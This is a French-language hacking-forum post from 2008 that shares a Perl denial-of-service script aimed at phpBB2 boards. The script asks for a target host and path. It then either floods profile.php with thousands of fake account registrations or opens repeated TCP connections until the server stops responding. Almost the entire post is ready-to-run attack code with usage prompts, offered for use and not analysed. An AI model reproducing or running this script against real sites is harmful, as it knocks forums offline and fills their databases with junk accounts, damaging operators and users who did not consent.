[Perl] phpBB2 Ddos Exploit

Moderator: Mod

[Perl] phpBB2 Ddos Exploit

Postby kmkz » Fri Mar 14, 2008 7:53 pm

Yop!
Pas plus de précision , le code parle es tassez explicite .^^
[code:1:7a0fec6d8c]#!/usr/bin/perl
#phpBB2 Ddoser sploit coded By : unl1m173d & kmkZ f0r => L| qu| D Squad
use IO::Socket;
use strict;
use warnings;

my $x = 0;


my $host=$ARGV[0];
if (@ARGV < 1)

{
die "\n + - - - - Usage : \n --------- perl phpbb_sploit.pl <(target)> |target => sans-> http://www. | \n\n"; # on passe l'hote en argument ou mode d'emploi du sploit
}


print " --phpBBDosReloaded - Ready to flood...\n\n";
print "(Path |exemple-> /phpBB2/ ou /| )\n";
my $pth = <STDIN>;
chomp ($pth);

print " \nFlood Type => 1 : pas de confirmation visuelle, 2 : Confirmation visuelle \n";
my $type = <STDIN>;
chomp ($type); # chomp la variable

if($type == 2){

while($x != 9999)
{

my $uname = "username=AHG__" . "$x";

my $umail = "&email=AHG__" . "$x";

my $postit = "$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";

my $lrg = length $postit;

my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nLe serveur ne répond plus, DoS reussi ? $!\n" unless $sock;


print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);


syswrite STDOUT, "+1"; # le +1 pour faire zolie ^^

$x++;
}
print " +++ exploit Terminé ! Serveur DOWN!! \n";
}# 2eme crochet pour la boucle

elsif($type == 1){ # 2eme condition , non visuelle cette fois-ci
while($x != 9999)
{

my $uname = "username=AHG__" . "$x";

my $umail = "&email=AHG__" . "$x";

my $postit = "$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";

my $lrg = length $postit;

my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nLe serveur ne répond plus, DoS reussi !!" unless $sock;

$x++;
}
print " +++ exploit Terminé ! Serveur DOWN !!\n";
}
print " [+] Coded by : \n
-kmkZ & unl1m173d \n\n
Liquid Squad
exit;[/code:1:7a0fec6d8c]
User avatar
kmkz
Projets
 
Posts: 120
Joined: Wed Feb 06, 2008 1:25 pm
Location: Carcassonne, Toulouse

Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 1 guest